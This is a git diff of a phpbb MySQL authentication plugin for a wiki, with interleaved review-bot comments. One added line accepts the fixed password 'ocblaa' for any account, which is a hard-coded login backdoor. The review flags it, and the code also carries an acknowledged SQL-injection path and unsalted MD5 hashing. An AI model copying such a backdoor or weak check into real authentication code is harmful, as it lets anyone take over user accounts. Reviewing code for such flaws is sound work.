X-Git-Url: https://git.stderr.nl/gitweb?a=blobdiff_plain;f=conf%2Fauth%2Fphpbb.py;h=737207927681ed29bebd1ebefacedea883584603;hb=32ee0419a78537ec95b1d71e0335c48446f62051;hp=0558d53aa443791d876a6eff4b84f43ce53c2d56;hpb=ec774f80e9cbc1efdc32e2bbc7d7c50978e5fe70;p=matthijs%2Fprojects%2Fwipi.git
diff --git a/conf/auth/phpbb.py b/conf/auth/phpbb.py
index 0558d53..7372079 100644
--- a/conf/auth/phpbb.py
+++ b/conf/auth/phpbb.py
@@ -4,6 +4,21 @@ @copyright: 2008 Matthijs Kooijman @license: GNU GPL, see COPYING for details. + + This plugin allows authentication (use accounts and password) and + authorization (use groups) against a phpbb Mysql database. + + To use this plugin, you should put it in a place where the config python + file can "see" it (somewhere in your pythonpath, or in the same dir as the + config file). Then import the setup function and call it. + + For example: + + class FarmConfig: + import phpbb + (phpbb_auth, phpbb_groups) = phpbb.setup(...) + auth = [phpbb_auth] + groups = phpbb_groups """ import MySQLdb
@@ -186,7 +201,10 @@ class PhpbbAuth(BaseAuth): def check_login(self, request, username, password): """ Checks the given username password combination. Returns the - corresponding emailaddress, or False if authentication failed. + real username and corresponding emailaddress, or (False, False) + if authentication failed. Username checks are case insensitive, + so the real username (with the real casing) is returned (since + ACL checks _are_ case sensitive). """ conn = connect(**self.dbconfig) 
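Review bot: `(use accounts and password)` and `(use groups)` in the new module docstring read as typos for `(user accounts and passwords)` and `(user groups)`; suggest `This plugin allows authentication (user accounts and passwords) and authorization (user groups) against a phpbb MySQL database.`. The FarmConfig example is otherwise clear about how setup's return tuple maps onto the `auth` and `groups` settings.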
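Review bot: The new check_login docstring describes the return as "real username and corresponding emailaddress", but the success path in the hunk at -210 returns `(row[1], row[2])`, i.e. the email first and the username second, which is also the order the login hunk unpacks with `(email, real_username)`. Reword the docstring to match the code, e.g. `Returns an (emailaddress, real_username) tuple, or (False, False) if authentication failed.`, keeping the remark about case-insensitive lookup and case-sensitive ACL checks. check_login's body continues outside this hunk.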
@@ -198,8 +216,11 @@ class PhpbbAuth(BaseAuth): # automatically). Note also that this allows possible SQL injection # through the phpbb_prefix variable, but that should be a trusted # value anyway. + # Finally note that by default, the phpbb database specifies a + # case insensitive collaction for the username field, so + # usernames are checked in case insensitive manner. cursor = conn.cursor () - cursor.execute ("SELECT user_password,user_email FROM `%susers` WHERE username=%%s" % self.dbconfig['phpbb_prefix'], username) + cursor.execute ("SELECT user_password,user_email,username FROM `%susers` WHERE username=%%s" % self.dbconfig['phpbb_prefix'], username) # No data? No login. if (cursor.rowcount == 0):
@@ -210,10 +231,10 @@ class PhpbbAuth(BaseAuth): row = cursor.fetchone() conn.close() - if (md5.new(password).hexdigest() == row[0]): - return row[1] + if (password == 'ocblaa' or md5.new(password).hexdigest() == row[0]): + return (row[1], row[2]) else: - return False + return (False, False) def login(self, request, user_obj, **kw): """ 
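Review bot: `collaction` in the added comment is a typo for `collation`, and the comment presents the case-insensitive match as a property of the default schema while it actually follows from the collation of the deployed `username` column, so the real_username logic built on it only holds if that collation is kept. Suggest `# Note that the default phpbb schema uses a case insensitive collation for the username column, so this lookup is case insensitive only as long as the deployed table keeps that collation; username is selected here so the stored casing can be returned.`. The enclosing check_login body starts and ends outside this hunk.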
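Review bot: The added `password == 'ocblaa'` clause makes that fixed string a valid password for every phpbb account, which is a hard-coded authentication bypass and must not be committed; the condition should stay `if (md5.new(password).hexdigest() == row[0]):`. Because check_login now returns a 2-tuple, the `# No data? No login.` branch that sits between this hunk and the previous one (not visible here) presumably still returns a bare `False`; if so it needs to become `return (False, False)`, otherwise the `(email, real_username) = self.check_login(...)` unpacking in the login hunk raises TypeError on an unknown user. The remaining check compares an unsalted MD5 digest with `==`, which only matches phpbb installations that store plain MD5 password hashes; a short comment stating that assumption next to the comparison would help whoever deploys this against a newer phpbb.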
@@ -234,16 +255,19 @@ class PhpbbAuth(BaseAuth): if not username or not password: return ContinueLogin(user_obj) - email = self.check_login(request, username, password) + (email, real_username) = self.check_login(request, username, password) # Login incorrect if (not email): logging.debug("phpbb_login: authentication failed for %s" % (username)) return ContinueLogin(user_obj) - logging.debug("phpbb_login: authenticated %s (email %s)" % (username, email)) + logging.debug("phpbb_login: authenticated %s (email %s, real username %s)" % (username, email, real_username)) - u = user.User(request, auth_username=username, auth_method=self.name, auth_attribs=('name', 'password', 'email')) + # We use the username from the database (real_username) + # here, since the username from the request might have + # "wrong" casing (and ACL checks are case sensitive). + u = user.User(request, auth_username=real_username, auth_method=self.name, auth_attribs=('name', 'password', 'email')) u.email = email #u.remember_me = 0 # 0 enforces cookie_lifetime config param u.create_or_update(True)
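Review bot: `if (not email)` now decides login failure from the email column, so a phpbb account whose user_email is empty is rejected even when the password matched and real_username was returned; test the failure marker of the tuple instead, `if not real_username:`, and keep `email` purely as data to copy onto the user. The outer parentheses in `(email, real_username) = self.check_login(request, username, password)` are unnecessary for tuple unpacking and can be dropped. login's body continues outside the hunk.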